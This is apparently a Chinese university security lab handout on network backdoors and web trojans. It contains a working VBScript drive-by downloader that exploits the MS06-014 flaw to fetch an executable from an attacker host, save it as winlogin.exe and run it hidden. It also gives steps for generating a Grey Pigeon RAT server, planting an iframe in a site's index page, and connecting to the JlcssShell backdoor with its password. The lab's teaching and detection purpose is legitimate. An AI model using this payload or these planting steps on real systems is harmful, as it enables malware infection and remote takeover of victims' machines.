1、1实验三 网络后门和网页木马【实验目的】理解后门的定义与分类;掌握后门的操作与原理;剖析网页木马的工作原理;理解木马的植入过程;学会编写简单的网页木马脚本;通过分析监控信息实现手动删除木马。【实验人数】每组 2 人【系统环境】Windows 【网络环境】交换网络结构【实验工具】灰鸽子木马;监控器工具;JlcssShell;网络协议分析器【实验原理】最早的后门是由系统开发人员为自己留下入口而安装的,而今天,并非开发人员将后门装入自己设计的程序中,而是大多数攻击者将后门装入他人开发和维护的系统中。通过使用这样的后门,攻击者可以很轻松地获得系统的访问权,进而获得系统的控制权。为了更加明确,我们给出后
2、门的以下定义: 后门是一个允许攻击者绕过系统中常规安全控制机制的程序,它按照攻击者自己的意愿提供通道。后门的作用在于为攻击者进入目标计算机提供通道。这个通道可能表现为不同形式,它取决于攻击者的目的和所使用的特定后门类型。后门能够为攻击者提供许多种不同类型的访问,包括以下几种:本地权限的提升:这类后门使得对系统有访问权的攻击者突然变换其权限等级成为管理员,有了这些超级用户权限,攻击者可以重新设置系统或访问任何存储在系统中的文件。单个命令的远程执行:利用这种类型的后门,攻击者可以向目标计算机发送消息。每次执行一个单独的命令,后门执行攻击者的命令并将其输出返回给攻击者。远程命令行解释器访问:正如我们
3、所知的远程 shell 命令,这种类型的后门允许攻2击者通过网络快递直接地键入受害计算机的命令提示。攻击者可以利用命令行解释器的所有特征,包括执行一个命令集合的能力编写脚本,选择一些文件进行操作。远程shell 比简单的单命令远程执行要强大得多,因为它们可以模拟攻击者对目标计算机的键盘有直接访问权的情形。远程控制 GUI(Remote Control of the GUI):比将命令行解释器弄混乱更甚,有些后门可以让攻击者看到目标计算机的 GUI,控制鼠标的移动,输入对键盘的操作,这些都是通过网络实现的。有了对 GUI 的远程控制,攻击者可以看到受害者对计算机的所有操作,甚至远程控制 GUI。
4、无论后门提供何种类型的访问,我们都会发现这些方法的重点在于控制。后门使得攻击者控制计算机,这一切通常是通过网络远程实现的。有了装入目标计算机的后门,攻击者可以利用这种控制搜索计算机中的易感染文件,改变存储在系统中的任何数据,改装计算机,甚至使系统瘫痪。利用后门,攻击者可以像受害者计算机本身的管理员一样对其进行同样的控制。更有甚者,攻击者可以通过 Internet 在世界的任何地方实现该控制。网页木马就是一个由黑客精心制作的含有木马的 HTML 网页,因为 MS06014 漏洞存在,当用户浏览这个网页时就被在后台自动安装了木马的安装程序。所以黑客会千方百计的诱惑或者欺骗人们去打开他所制作的网页,
5、进而达到植入木马的目的。不过随着人们网络安全意识的提高,这种方法已经很难欺骗大家了。还有一种方法就是通过标签,在一个正常网站的主页上链接网页木马。浏览者在浏览正常的网站主页时,iframe 语句就会链接到含有木马的网页,网页木马就被悄悄植入了。这种方法就是大家经常说的“挂马” ,而中了木马的主机通常被幽默的称作“肉鸡” 。 “挂马”因为需要获取网站管理员的权限,所以难度很大。不过他的危害也是十分巨大的,如果黑客获得了一个每天流量上万的知名网站的管理员权限并成功“挂马” ,那试想他会有多少“肉鸡” 。以下是挂马操作。3Set df = document.createElement(“object
6、“)df.setAttribute “classid“, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36“Set xh = df.createObject(“Microsoft.XMLHTTP“,“)Set ados = df.createObject(“Adodb.Stream“,“)ados.type = 1url = “http:/主机 IP 地址 :9090/Server_Setup.exe“xh.Open “GET“, url, Falsexh.SendSet fs = df.createObject(“Scripting.FileSystem
7、Object“,“)Set tmpdir = fs.GetSpecialFolder(2)fname1=“winlogin.exe“fname1= fs.BuildPath(tmpdir,fname1)ados.Openados.Write xh.responseBodyados.SaveToFile fname1,2ados.CloseSet sl = df.createObject(“Shell.Application“,“)sl.ShellExecute fname1,“,“,“open“,0【实验步骤】网络后门1. 系统自带远程控制工具(3389 远程控制)(1)设置远程登录用户。主机
8、 B 依次单击“我的电脑”“ 属性”“远程” “远程桌面” ,选中“启用这台计算机上的远程桌面” 。单击“选择远 程用户” 按钮 ,进入远程桌面用户,单击 “添加”按钮,添加远程用户帐户,在选择用户对话框中点选“高级” “立即查找” ,在查找结果中选择一个已存在的用户,按确定,完成用户添加工作。(2)将用户名,密码告知同组主机 A,并由其对 本机进行远程登录。4主机 A 依次单击 “开始”“程序”“ 附件”“通讯”“ 远程桌面连接” ,启动远程桌面连接工具,在计算机一栏填写同组主机 B 的 IP 地址,单击“连接” 按钮进行连接。在出现的登录界面中填入同组主机 B 提供的用户名和密码以图形界面
9、登录到同组主机。利用远程连接,在同组主机上进行文件操作,注意不要随便删除连接主机上的文件。2. 远程控制工具 JlcssShell(1)主机 B 首先在控制台中 执行 netstat -an,查看本机开启的端口情况。单击实验平台工具栏中“ JlcssShell”按钮,进入 JlcssShell 工作目录,运行 JlcssShell.exe,再次查看本机开启端口的情况,端口 21581 是否开启 。(2)主机 A 确认 JlcssShell 后门植入主机 B 后,用“telnet”命令对主机 B 连接并实现部分功能的控制。主机 A 打开命令行操作界面, 输入“telnet 主机 B 的 IP 地
10、址 21581”,其中“21581”为 JlcssShell 后门程序的执行端口。然后输入“连接密码” :jlcssok。 确 认后即可进入远程控制界面。输入“? ”键入“回车”,获取帮助菜单。注 帮助菜单中 q 操作不但能够退出当前远程连接操作,而且可以卸载远程shell 后门。因此在执行了 q 操作后,需要重新运行程序,启动后门。(3)主机 A 对主机 B 进行简单的磁盘操作。3.后门通信分析根据协议分析器对捕获数据的会话分析结果,回答下列问题:(1)后门客户程序进行网络主机后门探测时,其发送的最初网络数据的协议类型是_,通过该协议可以达到什么目标_。(2)若探测的目标主机存在(不一定存在
11、后门) ,后门客户程序接下来发送的网络数据 IP 上层协议类型是_、上层协议负载长度_(字节) 、最后 6 个字节文本内容是_。(3)受害主机对后门客户程序发出的后门探测命令的响应数据内容是_、IP上层协议类型是_。(4)后门客户程序发出枚举受害主机运行进程的命令是_。(5)通过命令 netstat -nap tcp(或 udp)查看服务端口,对比运行贪吃蛇程序后系统监听端口是否有变化?4 防御无端口后门应对 ICMP 无端口后门的最有效的方法就是在主机上 设置 ICMP 数据包的处理规则,极端的方法就是拒绝所有的 ICMP 数据包。请尝试启用实验系统自带的 Windows 防火墙,阻止后门通
12、信。网页木马5木马生成与植入在进行本实验步骤之前,我们再来阐述一下用户主机通过访问被“挂马” 的网站而被植入木马的过程,便于同学们理解和完成实验。(1)用户访问被“挂马”的网站主页。 (此网站是安全的)(2) “挂马”网站主页中的代码链接一个网址(即一个网页木马) ,使用户主机自动访问网页木马。 (通过把设置成不可见的,使用户无法察觉到这个过程)(3)网页木马在得到用户连接后,自动发送安装程序给用户。(4)如果用户主机存在 MS06014 漏洞,则自动下载木马安装程序并在后台运行。(5)木马安装成功后,木马服务端定时监测控制端是否存在,发现控制端上线后立即弹出端口主动连接控制端打开的被动端口。
13、(6)客户端收到连接请求,建立连接。1 生成网页木马(1)主机 A 首先通过 Internet 信息服务(IIS)管理器启动“ 木马网站” 。(2)主机 A 进入实验平台在工具栏中单击“灰鸽子”按钮运行灰鸽子远程监控木马程序。(3)主机 A 生成木马的“服务器程序” 。主机 A 单击木 马操作界面工具 栏“ 配置服务程序”按钮,弹出“服务器配置” 对话框,单击“自动上 线设置”属性页,在“IP 通知 http 访问地址、DNS 解析域名或固定 IP”文本框中输入本机 IP 地址,在“保存路径”文本框中输入“D:WorkIISServer_Setup.exe ”,单击“生成服 务器”按钮,生成木
14、马“服务器程序” 。(4)主机 A 编写生成网页木马的脚本。在桌面建立一个“ Trojan.txt”文档,打开“Trojan.txt” ,将实验原理中网马脚本写入,并将第 15 行 “主机 IP 地址 ”替换成主机 A 的 IP 地址。把 “Trojan.txt”文件扩展名改为“.htm”,生成“ Trojan.htm”。6注 C:ExpNISNetAD-LabProjectsTrojanTrojan.htm 文件提供了 VB 脚本源码。将生成的“Trojan.htm” 文件保存到 “D:WorkIIS”目录下(“D:WorkIIS ”为“木马网站”的网站空 间目录), “Trojan.htm
15、”文件就是网 页木马程序。2 完成对默认网站的“挂马”过程(1)主机 A 进入目录“C:Inetpubwwwroot” ,使用记事本打开“ index.html”文件。(“默认网站 ”的网站空间 目录为“C:Inetpubwwwroot” ,主页为“index.html” )(2)对“index.html”进行编辑。在代码的底部加上语句,具体见实验原理名词解释iframe 标签(需将 http:/ 修改为 http:/本机 IP:9090/Trojan.htm) ,实现从此网页对网页木马的链接。3 木马的植入(1)主机 B 设置监控。主机 B 进入实验平台,单击工具栏“监控器”按钮,打开监控器
16、。在向导栏中依次启动“ 进程 监控” 、 “端口监控” ,选择 “文件监控” ,在菜单栏中选择“选项”| “设置” ,在设置界面中设置监视目录“C:Windows” (默认已被添加完成) ,操作类型全部选中,启动文件监控。启动协议分析器,单击菜单“设置” “定义过滤器” ,在弹出的“ 定义过滤器”对话框中选择“网 络地址” 选项 卡,设置捕获主机 A 与主机 B 之间的数据。新建捕获窗口,点击“ 选择过滤 器” 按钮,确定过滤 信息。在捕获窗口工具栏中点击“开始捕获 数据包” 按钮 ,开始捕获数据包。主机 B 启动 IE 浏览器,访问“ http:/ 主机 A 的 IP 地址 ”。(2)主机
17、A 等待“灰鸽子远程控制” 程序主界面的“ 文件管理器”属性页中“文件目录浏览”树中出 现“自动上线主机”时通知主机 B。(3)主机 B 查看“ 进程监 控” 、 “服务监控” 、 “文件监控”和“ 端口监控”所捕获到的信息。7在“进程监控 ”|“变化视图”中查看是否存在“进程映像名称”为“ H.ini”的新增条目。观察进程监控信息,结合实验原理回答下面的问题。H.ini 文件是由哪个进程创建的:_;在“服务监控 ”中单击工具 栏中的“刷新”按钮,查 看是否存在“ 服务名称”为“Windows XP Vista” 的新增条目,观察服务监控信息,回答下面的 问题。Windows XP vista
18、 服务的 执行体文件是:_ ;在“文件监控 ”中查看“文件名”为“C:WINDOWSH.ini”的新增条目。在“端口监控 ”中查看“远程端口”为“8000” 的新增条目,观察端口监控信息,回答下面问题:8000 服务远程地址(控制端)地址:_;经过对上述监控信息的观察,你认为在“进程监控” 中出现的 winlogoin.exe 进程(若存在)在整个的木马植入过程中起到的作用是:_;(4)主机 B 查看协议分析器所捕 获的信息。注意图中划线部分的数据,结合实际结果找到对应的信息。协议分析器捕获信息【思考问题】1. 列举出几种不同的木马植入方法。2. 列举出几种不同的木马防范方法。3. 后门和木马的区别。
